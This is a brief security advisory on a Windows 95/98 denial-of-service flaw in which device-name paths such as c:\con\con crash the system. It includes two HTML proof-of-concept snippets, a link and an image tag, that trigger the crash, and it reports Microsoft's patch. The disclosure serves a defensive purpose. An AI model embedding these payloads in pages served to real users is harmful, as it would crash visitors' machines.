Device Names Crash Win95/98

 
Win95/98 Denial of Service

Reported March 3, 2000 by Filip Maertens

VERSIONS AFFECTED
Windows 95 and 98

DESCRIPTION

Windows 95 and 98 can be made to crash using URLs that point to a device (such as CON, AUX, NUL, etc) instead of actual Web pages.

Initially it appears as though the Win95/98 desktop shell contains the actual problem since various applications can be used to crash the operating system. For example, a malformed WarFTPd command that incorporates a device name can be used to cause an operating system crash.

DEMONSTRATION

Simple Web pages can refer to links that use a device name in the URL, such as the example below:

<HTML>
<BODY>
<A HREF="c:\con\con">crashing IE</A>
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</BODY>
</HTML>

Web pages can also contain image links that serve to crash the operating system, as seen below:

<HTML>
<BODY>
<IMG SRC="c:\con\con">
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</BODY>
</HTML>


VENDOR RESPONSE

Microsoft is aware of this issue, and has issued a patch for Win95 and Win98, a FAQ, and a Support Online article Q256015 regarding this problem.

CREDITS
Discovered by
Filip Maertens

Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish